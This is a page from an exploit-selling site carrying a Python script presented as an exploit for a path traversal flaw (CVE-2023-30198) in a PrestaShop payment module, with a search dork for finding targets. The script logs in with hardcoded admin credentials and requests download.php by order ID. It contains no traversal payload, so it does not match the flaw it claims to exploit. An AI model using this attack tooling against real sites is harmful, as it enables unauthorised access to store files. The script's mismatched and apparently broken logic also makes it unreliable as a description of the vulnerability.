0day.today - Biggest Exploit Database in the World.
![](/img/logo_green.jpg)
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earnGOLD
Administration of this site uses the official contacts. Beware of impostors!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
PrestaShop Winbiz Payment module - Improper Limitation of a Pathname to a Restricted Directory
Author
Risk
![](/img/risk/critlow_2.gif)
Security Risk Medium
]0day-ID
Category
Date add
CVE
Platform
# Exploit Title: PrestaShop Winbiz Payment module - Improper Limitation of a Pathname to a Restricted Directory # Dork: /modules/winbizpayment/downloads/download.php # country: Iran # Exploit Author: Amirhossein Bahramizadeh # Category : webapps # Vendor Homepage: https://shop.webbax.ch/modules-pour-winbiz/153-module-prestashop-winbiz-payment-reverse.html # Version: 17.1.3 (REQUIRED) # Tested on: Windows/Linux # CVE : CVE-2023-30198 import requests import string import random # The base URL of the vulnerable site base_url = "http://example.com" # The URL of the login page login_url = base_url + "/authentication.php" # The username and password for the admin account username = "admin" password = "password123" # The URL of the vulnerable download.php file download_url = base_url + "/modules/winbizpayment/downloads/download.php" # The ID of the order to download order_id = 1234 # The path to save the downloaded file file_path = "/tmp/order_%d.pdf" % order_id # The session cookies to use for the requests session_cookies = None # Generate a random string for the CSRF token csrf_token = ''.join(random.choices(string.ascii_uppercase + string.digits, k=32)) # Send a POST request to the login page to authenticate as the admin user login_data = {"email": username, "passwd": password, "csrf_token": csrf_token} session = requests.Session() response = session.post(login_url, data=login_data) # Save the session cookies for future requests session_cookies = session.cookies.get_dict() # Generate a random string for the CSRF token csrf_token = ''.join(random.choices(string.ascii_uppercase + string.digits, k=32)) # Send a POST request to the download.php file to download the order PDF download_data = {"id_order": order_id, "csrf_token": csrf_token} response = session.post(download_url, cookies=session_cookies, data=download_data) # Save the downloaded file to disk with open(file_path, "wb") as f: f.write(response.content) # Print a message indicating that the file has been downloaded print("File downloaded to %s" % file_path) # 0day.today [2024-06-28] #